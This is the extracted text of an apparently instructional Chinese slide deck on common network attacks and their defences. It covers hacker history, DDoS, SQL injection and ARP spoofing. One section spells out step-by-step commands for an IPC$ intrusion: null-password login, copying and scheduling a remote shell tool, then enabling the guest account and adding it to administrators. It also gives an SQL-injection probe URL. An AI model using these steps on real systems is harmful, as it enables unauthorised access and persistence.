網絡攻擊的常見手段與防范措施演示文稿

網絡攻擊的常見手段與防范措施演示文稿當前第1頁\共有42頁\編于星期日\12點網絡攻擊的常見手段與防范措施當前第2頁\共有42頁\編于星期日\12點01什么是網絡安全？02網絡安全的主要特性目錄一、計算機網絡安全的概念當前第3頁\共有42頁\編于星期日\12點什么是網絡安全？網絡安全：網絡安全是指網絡系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護，不因偶然的或者惡意的原因而遭受到破壞、更改、泄露，系統(tǒng)連續(xù)可靠正常地運行，網絡服務不中斷。當前第4頁\共有42頁\編于星期日\12點網絡安全的主要特性保密性信息不泄露給非授權用戶、實體或過程，或供其利用的特性。完整性數(shù)據(jù)未經授權不能進行改變的特性。即信息在存儲或傳輸過程中保持不被修改、不被破壞和丟失的特性?？捎眯钥杀皇跈鄬嶓w訪問并按需求使用的特性。即當需要時能否存取所需的信息。例如網絡環(huán)境下拒絕服務、破壞網絡和有關系統(tǒng)的正常運行等都屬于對可用性的攻擊；可控性對信息的傳播及內容具有控制能力?？蓪彶樾猿霈F(xiàn)安全問題時提供依據(jù)與手段當前第5頁\共有42頁\編于星期日\12點01入侵技術的歷史和發(fā)展02一般攻擊步驟03攻擊實例與攻擊方式目錄二、常見的網絡攻擊當前第6頁\共有42頁\編于星期日\12點黑客黑客是程序員，掌握操作系統(tǒng)和編程語言方面的知識，樂于探索可編程系統(tǒng)的細節(jié)，并且不斷提高自身能力，知道系統(tǒng)中的漏洞及其原因所在。專業(yè)黑客都是很有才華的源代碼創(chuàng)作者。起源：20世紀60年代目的：基于興趣非法入侵基于利益非法入侵信息戰(zhàn)當前第7頁\共有42頁\編于星期日\12點KevinMitnick凱文?米特尼克是世界上最著名的黑客之一，第一個被美國聯(lián)邦調查局通緝的黑客。1979年，15歲的米特尼克和他的朋友侵入了北美空中防務指揮系統(tǒng)。當前第8頁\共有42頁\編于星期日\12點莫里斯蠕蟲（MorrisWorm）

時間1988年肇事者羅伯特·塔潘·莫里斯,美國康奈爾大學學生，其父是美國國家安全局安全專家機理利用sendmail,finger等服務的漏洞，消耗CPU資源，拒絕服務影響Internet上大約6000臺計算機感染，占當時Internet聯(lián)網主機總數(shù)的10%，造成9600萬美元的損失黑客從此真正變黑，黑客倫理失去約束，黑客傳統(tǒng)開始中斷。當前第9頁\共有42頁\編于星期日\12點2001年中美黑客大戰(zhàn)事件背景和經過中美軍機南海4.1撞機事件為導火線4月初，以PoizonB0x、pr0phet為代表的美國黑客組織對國內站點進行攻擊，約300個左右的站點頁面被修改4月下旬，國內紅（黑）客組織或個人，開始對美國網站進行小規(guī)模的攻擊行動，4月26日有人發(fā)表了“五一衛(wèi)國網戰(zhàn)”戰(zhàn)前聲明，宣布將在5月1日至8日，對美國網站進行大規(guī)模的攻擊行動。各方都得到第三方支援各大媒體紛紛報道，評論，中旬結束大戰(zhàn)當前第10頁\共有42頁\編于星期日\12點PoizonB0x、pr0phet更改的網頁中經網數(shù)據(jù)有限公司中國科學院心理研究所國內某政府網站國內某大型商業(yè)網站當前第11頁\共有42頁\編于星期日\12點國內黑客組織更改的網站頁面美國勞工部網站美國某節(jié)點網站美國某大型商業(yè)網站美國某政府網站當前第12頁\共有42頁\編于星期日\12點這次事件中采用的常用攻擊手法紅客聯(lián)盟負責人在5月9日網上記者新聞發(fā)布會上對此次攻擊事件的技術背景說明如下：“我們更多的是一種不滿情緒的發(fā)泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系統(tǒng)，這個行動在技術上是沒有任何炫耀和炒作的價值的?！敝饕捎卯敃r流行的系統(tǒng)漏洞進行攻擊當前第13頁\共有42頁\編于星期日\12點這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統(tǒng)用戶名和密碼Unicode編碼可穿越firewall,執(zhí)行黑客指令ASP源代碼泄露可遠程連接的數(shù)據(jù)庫用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗證機制可被繞過Bind遠程溢出，Lion蠕蟲SUNrpc.sadmind遠程溢出，sadmin/IIS蠕蟲Wu-Ftpd格式字符串錯誤遠程安全漏洞拒絕服務(syn-flood,ping)當前第14頁\共有42頁\編于星期日\12點19801985199019952000密碼猜測可自動復制的代碼密碼破解利用已知的漏洞破壞審計系統(tǒng)后門會話劫持擦除痕跡嗅探包欺騙GUI遠程控制自動探測掃描拒絕服務www攻擊工具攻擊者入侵者水平攻擊手法半開放隱蔽掃描控制臺入侵檢測網絡管理DDOS攻擊2002高入侵技術的發(fā)展當前第15頁\共有42頁\編于星期日\12點01入侵技術的歷史和發(fā)展02一般攻擊步驟03攻擊實例與攻擊方式目錄當前第16頁\共有42頁\編于星期日\12點常見的攻擊方法端口掃描：網絡攻擊的前奏網絡監(jiān)聽：局域網、HUB、ARP欺騙、網關設備郵件攻擊：郵件炸彈、郵件欺騙網頁欺騙：偽造網址、DNS重定向密碼破解：字典破解、暴力破解、md5解密漏洞攻擊：溢出攻擊、系統(tǒng)漏洞利用種植木馬：隱蔽、免殺、網站掛馬、郵件掛馬DoS、DDoS：拒絕服務攻擊、分布式拒絕服務攻擊cc攻擊：借助大量代理或肉雞訪問最耗資源的網頁XSS跨站攻擊、SQL注入：利用變量檢查不嚴格構造javascript語句掛馬或獲取用戶信息，或構造sql語句猜測表、字段以及管理員賬號密碼社會工程學：QQ數(shù)據(jù)庫被盜當前第17頁\共有42頁\編于星期日\12點端口判斷判斷系統(tǒng)選擇最簡方式入侵分析可能有漏洞的服務獲取系統(tǒng)一定權限提升為最高權限安裝多個系統(tǒng)后門清除入侵腳印攻擊其他系統(tǒng)獲取敏感信息作為其他用途常見的系統(tǒng)入侵步驟當前第18頁\共有42頁\編于星期日\12點IP地址、主機是否運行、到要入侵點的路由、主機操作系統(tǒng)與用戶信息等。攻擊步驟1.收集主機信息

Ping命令判斷計算機是否開著，或者數(shù)據(jù)包發(fā)送到返回需要多少時間

Tracert/Tracerout命令跟蹤從一臺計算機到另外一臺計算機所走的路徑

Finger和Rusers命令收集用戶信息

Host或者Nslookup命令，結合Whois和Finger命令獲取主機、操作系統(tǒng)和用戶等信息應用的方法：當前第19頁\共有42頁\編于星期日\12點當前第20頁\共有42頁\編于星期日\12點獲取網絡服務的端口作為入侵通道。2.端口掃描1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達掃瞄 7種掃瞄類型：當前第21頁\共有42頁\編于星期日\12點3、系統(tǒng)漏洞利用

一次利用ipc$的入侵過程1.C:\>netuse\\x.x.x.x\IPC$“”/user:“admintitrator”

用“流光”掃的用戶名是administrator，密碼為“空”的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先復制srv.exe上去，在流光的Tools目錄下3.C:\>nettime\\x.x.x.x

查查時間，發(fā)現(xiàn)x.x.x.x的當前時間是2003/3/19上午11:00，命令成功完成。4.C:\>at\\x.x.x.x11:05srv.exe

用at命令啟動srv.exe吧（這里設置的時間要比主機時間推后）5.C:\>nettime\\x.x.x.x

再查查時間到了沒有，如果x.x.x.x的當前時間是2003/3/19上午11:05，那就準備開始下面的命令。當前第22頁\共有42頁\編于星期日\12點6.C:\>telnetx.x.x.x99

這里會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在《流光》的Tools目錄中

8.C:\WINNT\system32>ntlm

輸入ntlm啟動（這里的C:\WINNT\system32>是在對方計算機上運行當出現(xiàn)“DONE”的時候，就說明已經啟動正常。然后使用“netstarttelnet”來開啟Telnet服務)，接著輸入用戶名與密碼就進入對方了10.C:\>netuserguest/active:yes

為了方便日后登陸,將guest激活并加到管理組11.C:\>netuserguest1234

將Guest的密碼改為123412.C:\>netlocalgroupadministratorsguest/add

將Guest變?yōu)锳dministrator當前第23頁\共有42頁\編于星期日\12點01入侵技術的歷史和發(fā)展02一般攻擊步驟03攻擊實例與攻擊方式目錄當前第24頁\共有42頁\編于星期日\12點北京時間10月22日凌晨，美國域名服務器管理服務供應商Dyn宣布，該公司在當?shù)貢r間周五早上遭遇了DDoS（分布式拒絕服務）攻擊，從而導致許多網站在美國東海岸地區(qū)宕機，Twitter、Tumblr、Netflix、亞馬遜、Shopify、Reddit、Airbnb、PayPal和Yelp等諸多人氣網站無一幸免。Dyn稱，攻擊由感染惡意代碼的設備發(fā)起，來自全球上千萬IP地址，幾百萬惡意攻擊的源頭是物聯(lián)網聯(lián)系的所謂“智能”家居產品。1、DDoS（分布式拒絕服務）攻擊當前第25頁\共有42頁\編于星期日\12點攻擊現(xiàn)象被攻擊主機上有大量等待的TCP連接；網絡中充斥著大量的無用的數(shù)據(jù)包；源地址為假制造高流量無用數(shù)據(jù)，造成網絡擁塞，使受害主機無法正常和外界通訊；利用受害主機提供的傳輸協(xié)議上的缺陷反復高速的發(fā)出特定的服務請求，使主機無法處理所有正常請求；嚴重時會造成系統(tǒng)死機。分布式拒絕服務攻擊：借助于C/S（客戶/服務器）技術，將多個計算機聯(lián)合起來作為攻擊平臺，對一個或多個目標發(fā)動DDoS攻擊，從而成倍地提高拒絕服務攻擊的威力當前第26頁\共有42頁\編于星期日\12點分布式拒絕服務攻擊攻擊流程1、搜集資料，被攻擊目標主機數(shù)目、地址情況，目標主機的配置、性能，目標的寬帶。2、是占領和控制網絡狀態(tài)好、性能好、安全管理水平差的主機做傀儡機。3、攻擊者在客戶端通過telnet之類的常用連接軟件，向主控端發(fā)送發(fā)送對目標主機的攻擊請求命令。主控端偵聽接收攻擊命令，并把攻擊命令傳到分布端，分布端是執(zhí)行攻擊的角色，收到命令立即發(fā)起flood攻擊。

當前第27頁\共有42頁\編于星期日\12點主機設置所有的主機平臺都有抵御DoS的設置，基本的有：1、關閉不必要的服務2、限制同時打開的Syn半連接數(shù)目3、縮短Syn半連接的timeout時間4、及時更新系統(tǒng)補丁網絡設置1.防火墻禁止對主機的非開放服務的訪問限制同時打開的SYN最大連接數(shù)限制特定IP地址的訪問啟用防火墻的防DDoS的屬性嚴格限制對外開放的服務器的向外訪問第五項主要是防止自己的服務器被當做工具去害人。2.路由器設置SYN數(shù)據(jù)包流量速率升級版本過低的ISO為路由器建立logserver防范措施當前第28頁\共有42頁\編于星期日\12點雅虎作為美國著名的互聯(lián)網門戶網站，也是20世紀末互聯(lián)網奇跡的創(chuàng)造者之一。然而在2013年8月20日，中國雅虎郵箱宣布停止提供服務。就在大家已快將其淡忘的時候，雅虎公司突然對外發(fā)布消息，承認在2014年的一次黑客襲擊中，至少5億用戶的數(shù)據(jù)信息遭竊。此次事件成為了有史以來規(guī)模最大的單一網站信息泄露事件。2、SQL注入攻擊當前第29頁\共有42頁\編于星期日\12點攻擊方法SQL注入主要是由于網頁制作者對輸入數(shù)據(jù)檢查不嚴格，攻擊者通過對輸入數(shù)據(jù)的改編來實現(xiàn)對數(shù)據(jù)庫的訪問，從而猜測出管理員賬號和密碼；如/view.asp?id=1；改為/view.asp?id=1anduser=‘admin’；如果頁面顯示正常，說明數(shù)據(jù)庫表中有一個user字段，且其中有admin這個值；通過SQL注入攻擊可以探測網站后臺管理員賬號和密碼。SQL注入：就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串，最終達到欺騙服務器執(zhí)行惡意的SQL命令。具體來說，它是利用現(xiàn)有應用程序，將（惡意）的SQL命令注入到后臺數(shù)據(jù)庫引擎執(zhí)行的能力，它可以通過在Web表單中輸入（惡意）SQL語句得到一個存在安全漏洞的網站上的數(shù)據(jù)庫，而不是按照設計者意圖去執(zhí)行SQL語句。當前第30頁\共有42頁\編于星期日\12點利用探測出的管理員賬號和密碼登陸網站后臺，在擁有附件上傳的功能模塊中嘗試上傳網頁木馬或一句話木馬（一般利用數(shù)據(jù)庫備份和恢復功能）；通過網頁木馬探測IIS服務器配置漏洞，找到突破點提升權限，上傳文件木馬并在遠程服務器上運行；通過連接木馬徹底拿到系統(tǒng)控制權；因此，SQL注入只是網站入侵的前奏，就算注入成功也不一定可以拿到webshell或root。當前第31頁\共有42頁\編于星期日\12點1、輸入驗證檢查用戶輸入的合法性，確信輸入的內容只包含合法的數(shù)據(jù)。2、錯誤消息處理防范SQL注入，還要避免出現(xiàn)一些詳細的錯誤消息，因為黑客們可以利用這些消息。要使用一種標準的輸入確認機制來驗證所有的輸入數(shù)據(jù)的長度、類型、語句、企業(yè)規(guī)則等。3、加密處理將用戶登錄名稱、密碼等數(shù)據(jù)加密保存。4、存儲過程來執(zhí)行所有的查詢SQL參數(shù)的傳遞方式將防止攻擊者利用單引號和連字符實施攻擊。此外，它還使得數(shù)據(jù)庫權限可以限制到只允許特定的存儲過程執(zhí)行，所有的用戶輸入必須遵從被調用的存儲過程的安全上下文，這樣就很難再發(fā)生注入式攻擊了。5、使用專業(yè)的漏洞掃描工具6、確保數(shù)據(jù)庫安全7、安全審評防范措施當前第32頁\共有42頁\編于星期日\12點3、ARP攻擊ARP（AddressResolutionProtocol，地址解析協(xié)議）是根據(jù)IP地址獲取物理地址的一個TCP/IP協(xié)議。ARP攻擊就是通過偽造IP地址和MAC地址實現(xiàn)ARP欺騙，能夠在網絡中產生大量的ARP通信量使網絡阻塞，攻擊者只要持續(xù)不斷的發(fā)出偽造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目，造成網絡中斷或中間人攻擊。ARP攻擊僅能在局域網內進行。ARP請求包是以廣播的形式發(fā)出，正常情況下只有正確IP地址的主機才會發(fā)出ARP響應包，告知查詢主機自己的MAC地址。局域網中每臺主機都維護著一張ARP表，其中存放著<IP—MAC>地址對。當前第33頁\共有42頁\編于星期日\12點ARP改向的中間人竊聽A發(fā)往B：(MACb，MACa，PROTOCOL，DATA)B發(fā)往A：(MACa，MACb，PROTOCOL，DATA)A發(fā)往B：(MACx，MACa，PROTOCOL，DATA)B發(fā)往A：(MACx，MACb，PROTOCOL，DATA)當前第34頁\共有42頁\編于星期日\12點原理：X分別向A和B發(fā)送ARP包，促使其修改ARP表主機A的ARP表中B為<IPb—MACx>主機B的ARP表中A為<IPa—MACx>X成為主機A和主機B之間的“中間人”，可以選擇被動地監(jiān)測流量，獲取密碼和其他涉密信息，也可以偽造數(shù)據(jù)，改變電腦A和電腦B之間的通信內容。防范措施：網關和終端雙向綁定IP和MAC地址。局域網中的每臺電腦中進行靜態(tài)ARP綁定。打開安全防護軟件的ARP防火墻功能